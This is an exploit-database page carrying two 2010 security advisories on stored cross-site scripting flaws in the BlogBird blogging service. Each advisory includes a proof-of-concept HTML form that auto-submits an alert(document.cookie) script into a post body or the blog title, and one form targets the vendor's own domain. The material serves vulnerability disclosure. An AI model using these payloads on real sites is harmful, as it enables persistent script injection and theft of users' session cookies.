header-logo
Suggest Exploit
vendor:
BlogBird
by:
High-Tech Bridge SA - Ethical Hacking & Penetration Testing
6,4
CVSS
MEDIUM
Stored XSS (Cross Site Scripting)
79
CWE
Product Name: BlogBird
Affected Version From: Current actual version on http://www.blogbird.nl/
Affected Version To: Current actual version on http://www.blogbird.nl/
Patch Exists: YES
Related CWE: N/A
CPE: a:blogbird:blogbird
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Browser
2010

XSS Vulnerability in BlogBird

User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the blog elements saving script to properly sanitize user-supplied input in 'body' variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability.

Mitigation:

Upgrade to the most recent version
Source

Exploit-DB raw data:

Vulnerability ID: HTB22647
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_blogbird_1.html
Product: BlogBird
Vendor: BlogBird ( http://www.blogbird.nl/ ) 
Vulnerable Version: Current actual version on http://www.blogbird.nl/
Vendor Notification: 13 October 2010 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the blog elements saving script to properly sanitize user-supplied input in "body" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://site/elements/save/2648" method="post" name="main">
<input type="hidden" name="files_id" value="123">
<input type="hidden" name="type" value="posts">
<input type="hidden" name="column" value="col1">
<input type="hidden" name="title" value="post title">
<input type="hidden" name="element" value="post">
<input type="hidden" name="body" value='post text"><script>alert(document.cookie)</script>'>
<input type="hidden" name="extended" value="">
<input type="hidden" name="publish" value="1">
<input type="hidden" name="page" value="home">
<input type="hidden" name="author" value="author">
<input type="hidden" name="tags" value="">
</form>
<script>
document.main.submit();
</script>

Solution: Upgrade to the most recent version

-----------------------------------------------------------------------------------------------------------------

Vulnerability ID: HTB22646
Reference: http://site/advisory/xss_vulnerability_in_blogbird.html
Product: BlogBird
Vendor: BlogBird ( http://www.blogbird.nl/ )
Vulnerable Version: Current actual version on http://www.blogbird.nl/
Vendor Notification: 13 October 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the blog setting save script to properly sanitize user-supplied input in "title" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://www.blogbird.nl/settings/save" method="post" name="main">
<input type="hidden" name="title" value='My Blog Title"><script>alert(document.cookie)</script>'>
<input type="hidden" name="description" value="">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="language" value="dutch">
<input type="hidden" name="date_format" value="">
<input type="hidden" name="per_page" value="0">
</form>
<script>
document.main.submit();
</script>

Solution: Upgrade to the most recent version